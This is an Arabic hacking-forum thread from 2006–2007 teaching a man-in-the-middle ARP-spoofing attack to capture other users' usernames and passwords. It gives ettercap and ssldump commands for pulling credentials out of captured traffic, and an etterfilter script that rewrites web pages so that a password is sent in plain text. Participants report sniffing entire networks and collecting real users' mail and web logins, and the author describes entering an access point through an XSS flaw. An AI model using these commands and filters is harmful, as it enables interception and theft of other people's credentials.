المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : man in the middle attacking



الصفحات : [1] 2

godfather
04-12-2006, 01:21
السلام عليكم

الموضوع يدور حول ما يسمى man in the middle وهو نوع من انواع السنايف للحصول على المعلومات المطلوبة مثل اليوزيرز نيم والباسورد وغيرها الكثبر

الموضوع يتلخص بان يقوم المهاجم بوضع نفسه بين الضحية والسيرفر او الرواتر ....الخ

ويتم هذا من خلال ادوات معينة اليوم بنتكلم عن ما يسمى ARP-SPOOFING

انت مثلا لما COMMAND PROMPT في الوندوز وتقوم بكتابة الامر التالي
arp -a

سوف تلاحظ الناتج كالاتي وهو اي بي وماك ادريس الكيت وي او الراوتر .....الخ

لكن عندما تتعرض الى هذا الهجوم ماذا سوف يكون الناتج يكون ناتج مختلف سوف تلاحظ انه هناك ايبيان مختلفان ولكن لهما نفس الماك ادريس وهوو هذا المقصود ب ARP-spoofing


كيف يتم هذا ؟سوف نوضح كيف يتم

العمل سوف يكون من على احد ى توزيعات اللينوكس

الادوات هي :-

arpspoof

dsniff

fragrouter

العمل :-

لنفرض انه لدينا الشبكة التاليه

https://www.m5zn.com/uploads/158c5d6eab.png (https://www.m5zn.com)

مثل ما تلاحظ هناك الضحية والمهاجم والسيرفر

لنفرض ان اي بي الضحية هو 192.168.0.183 واي بي السيرفر هو 192.168.0.1

لكي نعمل ارب سبووف يجن ان ننفذ الامرين التالين

https://www.m5zn.com/uploads/82536dece8.png (https://www.m5zn.com)


الامر الثاني

https://www.m5zn.com/uploads/a0fb2cf995.png (https://www.m5zn.com)

الان نعمل ما يسمى اي بي فورورد من خلا ل الامر التالي https://www.m5zn.com/uploads/9218bb61a3.png (https://www.m5zn.com)

الان نعمل سنايف من خلال الكارت الذي لدينا ومن خلال هذا الامر

https://www.m5zn.com/uploads/3153250ae0.png (https://www.m5zn.com)

الان ننتظر حتى يقوم الضحية باحد هذه الامور وهي ام فتح السيرفر عن طريق التلينت

او من خلال ftp او من خلال http

انا بالنسبة للشبكة التي انا موجود فيها ما فيها التلينت او اف تي بي

يوجد فقط http

لم يقوم الضحية بالولوج السيرفر عن طريق http ومن خلال البورت 80 سوف اتمكن من الحصول على اليوزر والباسورد كما تلاحظ في الصورة

https://www.m5zn.com/uploads/15bc73cbd7.png (https://www.m5zn.com)


وهذا هو شرح موجز لانه هناك الكثير من الامور التي بالامكان عملها من خلال هذا التكنيك

اتمنى ان تكون قد استفدتم من الموضوع وبالذات الاخ TET_TAT




وشكرا

TeT_TaT
04-12-2006, 07:16
ياسلام عليكم شرح جميل وخفيف على المعده
المشكله الحالياة التي تواجهني هي النظام الغبي
الي استخدمه , الذي من جد بدأت احسن انه صار عله

شكرا لك اخي مره اخرى , استفدت من الدرس بالطبع
وننتظر جديدك دوماً

TeT_TaT

C|EH
04-12-2006, 08:44
بارك الله فيك اخي godfather وشروحاتك الممتازة ، بارك الله فيك ،،

تستطيع ايضا استعمال Session Hijacking بإستعمال برنامج مثل T-Sight وتخطف الجلسة بين السيرفر والهندي المحترف وتصيد كل ما يكتبه ،،

بالنسبة للman in the middel اظن ما تنفع اذا كان يستعمل SSH كلاينت ، لان البيانات وان حصلت عليها راح تكوزن مشفرة ،،

واستمر اخي بشرحلك الجميل المميز بالفعل ،

TeT_TaT
04-12-2006, 09:17
شكرا لكم اخواني
بصراحة كل الي ابغا هو تغير الباكج حقى علشان يصير 512
غير كذا لمن ارجع الكلية اطقطع على هذي الدروس شوي


الخوف لا يصير فيني زي
https://www.cartoonstock.com/lowres/mba0279l.jpg

TeT_TaT
04-12-2006, 09:20
Man-in-the-Middle: Vulnerabilities in SSH/Public Key


https://xperts.sce.carleton.ca/2004-05/MITMV/

adam black ice
04-12-2006, 19:10
شكرا على الشرح الجميل وهذه الهجمه استخدمها كيفين ميتنك مع شهبورا (مسؤل الامن) ( فى ال FBI ) حيث ان شهبورا كان يستخدم نظام ال X windows من بيته لكى يتصل بجهازه الموجود فى مكتبه داخل الف بى اى وتتبع ميتنك الباكتس التى تخرج بين الجهازين ثم قام بعمل بكت وارسلها للجهاز الموجود فى الف بى اى وبذلك اصبح هو Man in the middle وتم القبض عليه بعد ذلك

Modi_mma
04-12-2006, 21:01
شكرا لك على هذا الموضوع الجميل

black-night
23-02-2007, 13:36
عاشت الايادي اخي الغالي شرح ولا اروع

tgh12
23-02-2007, 20:24
plese sire i cant fing fragrouter in bt 2 linux distribution
how can i do and when i typed arpspoof -t 192.168.0.14
the answer is cant arpspoof plese mr godfather help me

godfather
23-02-2007, 23:51
plese sire i cant fing fragrouter in bt 2 linux distribution
how can i do and when i typed arpspoof -t 192.168.0.14
the answer is cant arpspoof plese mr godfather help me

ok , with back|track2 , u do not need all those tools in ny pervious tutorial , you can use ettercap and dsniff instead of it , but do not forgot to edit etter.conf before , u welcome , see you

C|EH
24-02-2007, 02:49
اخي godfather شكرا لك ،،

انا عملت arp spoof واستعملت برنامج ettercap وكل شيء تمام ،، وصار السنف على الشبكة كلها لاني اخترت ال Target كل الشبكة ،، وطلع لي كل باسورردات ال clear Text ،، مثل Pop3 , ftp وهكذا ،،


ولكن ماذا بالنسبة لل SSL كيف يمكن استخلاصها من الباكيجات اللي جمعتها عن طريق Etheral ثم استعملت TCPreplay او بالettercap مباشرة ؟!

هناك طريقة ولكن شوي لم افهم لها ، اذا ممكن توضحلي اياها ،،

انا استعمل back|track v1

tgh12
24-02-2007, 13:24
شكرا لك اخي الكريم godfather على هذه النصيحة واعذرني البارحة كتبت باللغة الانكليزية لاني
كنت استعمل الباك تراك 2 وارجو منك ان ترشدني الى ملفات فديو او شروحات عن الباك تراك 2 عن
السنفر و السبوفر و الكراكر و البورت سكنر لاني جديد في الباك تراك واحتاج الى مساعدة منك ومن
كل الخبراء في الباك تراك 2 ارجو الرد والمساعدة

godfather
24-02-2007, 22:14
اخوي العزيز ابو يوسف

بالنسبة ssl هناك اكثر من طريقة ولكن الطريقة الاسهل هي دائما المرغوبة ومن خلالها ممكن انت تكتشف طرق اخر

اول خطوة تكتب الامر التالي



ettercap -G -W filename

اعتقد الامر واضح هي جمع البكيت في ملف ومن ثم انت عليك تكمل ما تحتاج له

لما تكمل العملية وتحب تفراء البكيت اللي تحتوي على ssl استخدم الامر التالي



ssldump -r filename -k /usr/local/share/ettercap/etter.ssl.crt -d >> out.txt

ومن ثم تستخدم الامر التالي طبعا تستطيع اتغير بالامر الاخير حسب الذي تريد


cat out.txt | grep pass

ملاحظة العمل على الباك تراك

اخي العزيز tgh12 اهلا وسهلا بيك انت ممكن تعمل على الباك تراك او غيره ولما تحتاج للمساعدة ممكن تكتب السؤال ونحن بعون الله نقدم المساعدة


الى اللقاء

tgh12
25-02-2007, 06:31
اخي العزيز godfather اريد اوامر نفس المثال المشروح تبعك بس على الباك تراك 2 وخاصة كيفية استخدام ال ettercap وال disniff واكون شاكر وممنون لك اخي العزيز
ملاحظة اخيرة هذا العمل نقوم به بالمونيترمود لو بالمنج مود ارجو الافادة
مع الشكر والتقدير اخوك tgh12

godfather
25-02-2007, 10:21
اخي العزيز ما يميز بعض الادوات والبرامج التي تعمل من على منصات لينوكس انها ممكن ان تعمل بحالتين الحالة الاولى هي passive mode والحالة الثانية active mode بالعكس من الوندوز الذي يعمل فقط على الحالة الثانية فقط والامثلة كثير ة بالنسبة للحال الاول على سبيل المثال لا الحصر برنامج كزمت فهو يعمل من passive mode اللي انت سميته moniter mode اللي هي حالة كارت الوايرلس وليست حالة الاتصال ولسوء الحظ البرامج اللي انت تريد تعرف كيف تعمل

هي تعمل من حالة active moode يعني لابد ان تكون متصل
بالنسبة للباك 2 مثل ما اخبرتك مسبقا انت ممكن تنفذ المثال اعلاه من خلال برنامج ettercap فقط لان الطريقة في المثال الاول اصبحت قديمة ولاتنسى ان الباك 2 هو تجريبي ولايحتوي على بعض هذه الادوات

ومثل ما وضحت للاخ ابو يوسف هذه الطريقة الافضل والاسهل والاكثر فعالية

ثم ان برنامج ettercap فيه الكثير من الامكانيات الخطيرة جدا وهي تتمشل بالفلاتر التي يحتويه والتي تعدل حسب رغبة المستخدم وبالذات اذا كان المستخدم يمتلك خلفية برمجية وهذا ما افضله انا شخصيا

كل ما عليك هو ان تجرب البرنامج وعندما تواجه مشكلة معينة ابحث اولا عن الحل من خلال غوغل وان لم تجد الحل ممكن تسال هنا وسنحول تقديم المساعدة لك


الى اللقاء

C|EH
27-02-2007, 13:53
شكرا لك اخي godfather العملية نجحت معي ، واستطعت الحصول على عدد من الاسماء والباسووردات ولانه الملف اللي جمعته كبير 700 ميجا - صرت حول وانا ابحث رغم اني كنت استعمل البايب وال less وكل شيء ،،

ولكن مثلا رايت تسجيل دخول على الهوت ميل و الياهو ،، ولكن كانه الباسووردات كانت مشفرة MD5 ،، كيف يتم اظهارها ،،

والف شكر لك اخي ،، اظن يجب علي استعمال الفلاتر اثناء جمع الباكيج ،،

اذا ممكن تكتبلي فلتر صغير او معدل لهم اكون شاكرلك

godfather
27-02-2007, 14:37
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}

if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "//alert(\x22url=\x22 + url);")) {
replace("//alert(\x22url=\x22 + url);", "url += \x22&.e=\x22+passwd; "); # note: replacement string is same length as original string
msg("Sent the passwd in plain-text in '.e'.\n");
}
}

godfather
27-02-2007, 15:07
اولا نعمل كومبلي للفايل فلتر بهذا الامر


etterfilter file.filter -o file.ef

ثم انشغل البرنامج ونعمل كل شي خاص بالهجوم ولكن قبل عمل سنايف اختر الفلتر ثم اعمل سنايف

وعمل كبجر بولسطة الاثيريل

وهناك طرق اخرى



الى اللقاء

The King2
28-02-2007, 07:59
https://img96.imageshack.us/img96/7495/mashckorzg7.gif

fax
04-03-2007, 02:32
ما شاء الله ..
صحيح اني ماني متوعب الفكره كامله .. ولكن واضح ان الشرح جيد والدليل الشباب اللي استفادوا منه
انشالله ف يوم نفهم بعض هذه الامور ونطبقها :)
جزاك الله خير اخوي

العقرب2006
06-03-2007, 01:36
شكرا جزيلا اخي الكريم godfather على هذا الموضوع الشيق ولدي بعض الاسئلة وهي اولا هل تنفع هذه الطريقه مع منظومات تستخدم الويب كي كحماية اوليه والمايكروتك كخط حماية ثاني ؟واذا كانت تنفع فهل تنجح مع الاصدارات الحديثه من المايكروتك؟والذي فهمته انك يجب ان تكون متصلا من اجل عمل السنايف ومن ملاحظتي ان هناك اصدار جديد من المايكروتك يعمل على قطع الاتصال عند محاولة السنايف على المنظومه وكذلك عند تشغيل برنامج النت كات --وشكرا مقدما -------اخوك---العراقي

tgh12
06-03-2007, 16:48
please mr godfather i want to know step by step to find user and password if
threr is wepkey and mikrotik firewall and the packet we are use it from airodump or another sniffing files packetes my ask in backtrack please help
my second question is i have wlan dlink dwl-g520
in the preveous month i cracked wep key 64-bit in 45 minuts
but today when i use airodump-ng and aireplay-ng on the same network the ivs not raising i tried several attack but not work note i use aircrack-ng -0.7
please help
your brother tgh12 from iraq

godfather
07-03-2007, 09:37
why people ask . how to hack??!! hmmm

did you know this the concept . HACK TO LEARN NOT LEARN TO HACK

did you know some things about security protocols ?, that is maybe used by mikrotik router!hm
let us assume , you know
let us talking about those protocols , what those and what the best
first answer
1. MAC ACLs
2. LEAP
3. EAB-MD5
4. EAB-SIM
5.ETC.....MORE

you can search about details

second answer , what the best and why ? hmm

the first three protocols used mutual authentication , than . those can not protect against man-in-the-middle attacks on authentication messages

so, the best chose , is fourth , it is work like dual-mode phones with SIM cards.

now , we understood ,what , and why

let us ask ourself
is mikrotik administrator has solid background , what and how those protocols work , what is the best chose ?hmm
if he can install the simulator router that is not mean he understand what he do


ok


maybe in next days i write hotspot tutorial


see you

dlink
10-03-2007, 02:57
thanks alot god father and we hope that you make an amazing work in bt2 final and tell us about new featuers

tgh12
10-03-2007, 10:26
thank you brother
i hope you specified special toturials on backreack and security specially
hotspot &ettercap &wireshark &
how we can modify &change source code of program &compile them explain these programs by text and video to improve our selves and take advantage from your expeirence in knowlege of security and backtrack 2 final
plese mr godfather dont leave us and support us in toturials
your brother tgh12 from iraq with thanks

Movenpick
12-03-2007, 16:19
أحب الـnetcat

tgh12
19-03-2007, 11:14
السلام عليكم اخي العراب شكرا لك على المشاركات الجميلة والمتميزة ونحن اذ نسال عن اليوزر
نيم والباسورد في man in the middle attack وال microtik ليس لمجرد LEARN TO HACK بل بالعكس تماما لانه وحدة الباك تراك كافي ولكن لانه نريد ان نتعلم ونستفاد من كل الطرق والبرامج
ولان اللينكس هو اوبن سورس فلذلك لايوجد احتكار للمعلومات لذلك اخي الكريم ارجو الافادة لاننا
جدد في الباك تراك ولاننا في العراق حيث ان الكهرباء دائمة الانقطاع والظروف بالعراق غير مستقرة وانت على علم بهذا ولاننا نريد ان نعوض مافاتنا من اللينكس وتطبيقاته الهامة ارجو الافادة اخي الكريم مع الشكر والتقدير

tgh12
19-03-2007, 11:18
السلام عليكم اخي العراب شكرا لك على المشاركات الجميلة والمتميزة ونحن اذ نسال عن اليوزر
نيم والباسورد في man in the middle attack وال microtik ليس لمجرد LEARN TO HACK بل بالعكس تماما لانه وحدة الباك تراك كافي ولكن لانه نريد ان نتعلم ونستفاد من كل الطرق والبرامج
ولان اللينكس هو اوبن سورس فلذلك لايوجد احتكار للمعلومات لذلك اخي الكريم ارجو الافادة لاننا
جدد في الباك تراك ولاننا في العراق حيث ان الكهرباء دائمة الانقطاع والظروف بالعراق غير مستقرة وانت على علم بهذا ولاننا نريد ان نعوض مافاتنا من اللينكس وتطبيقاته الهامة ارجو الافادة اخي الكريم مع الشكر والتقدير !Clap

godfather
19-03-2007, 14:50
اهلا بيك اخوي العزيز

بالنسبة للمايكروتك هو سميليتر راوتر يستخدم بكثرة هذه الايام

كنت في اجابة سابقة قد تكلمت عن بعض البروتوكولات الامنية التي من الممكن استخدامها

وهناك غيرها من البروتوكولات ولكن على الاغلب المستخدم منها هو

leap وكذلك eap/md5
وكذلك ممكن استخدام vpn

او pptp او pppoE

اعتفد هذه هي البروتوكلات المستخدمة من قبل البعض
على فكرة اغلب اصحاب الشبكات الموجودين حالين هم ليس على درايه كاملة بالموضوع اقصد ما يخص السيكيورتي وكذلك اغلبيهم لايهتم بموضوع سرية المعلومات المنتقلة خلال شبكته اقصد ما يخص الزبائن

الخطوة الاولى هي تحديد البروتكولا المستخدم
ومن ثم تحديد الهارويرات المستخدمة لان البعض من الاكسس بوينتات تحتوي على هذه البروتوكلات من غير الحاجة الى تثبين سيرفر ريديس او مايكروتك

فمن الضروري معرفة الهاردوير ومن ثم البحث عن الثغرات في هذا الهاردوير

على سبيل االمثال لدي صديق يستخدم اكسس بوينت بالامكان استخدام احد البروتوكلات اعلاه من خلالها
وكن نعمل نبحث عن ثغرة لهذه الاكسس وبالفعل وجدنا ثغرة XSS

وقمنا بكتابة السيكريبت ومن ثم الدخول على الاكسس بدون معرف اليوزر والباس تبع الاكسس

اقصد الدخول على الاكسس وليس الشبكة بمعنى اخر انك لاتحتاج الى التخويل من الشبكة حتى تتمكن من الدخول على الاكسس

وكما تلاحظ اهم موضوع بالعملية هي اكتشاف الثغرة والاداة التي استخدمنها هي NESSUS وهي اداة شهيرة

بالنسبة لبعض البروتوكلات انا كاتب موضوع بتكلم عن الثغرة لهذه البرونوكلات وكيفية استغلالها في هذا المنتدى
ممكن تشاهد هذا الصفحة

https://www.arabhardware.net/forum/showthread.php?t=43284&highlight=pptp

وبالنسبة للكهرباء ما اعرف شنو دخلها بالموضوع ان كانت الكهرباء سيئة فهذا بسبب المتخلفين الذين يديرون منظومة الكهرباء


الى اللقا ء

tgh12
19-03-2007, 19:50
الف رحمة على والديك اخي العزيز godfather وشكرا على المعلومات القيمة وهذا من كرم اخلاقك
اخوك tgh12 !Clap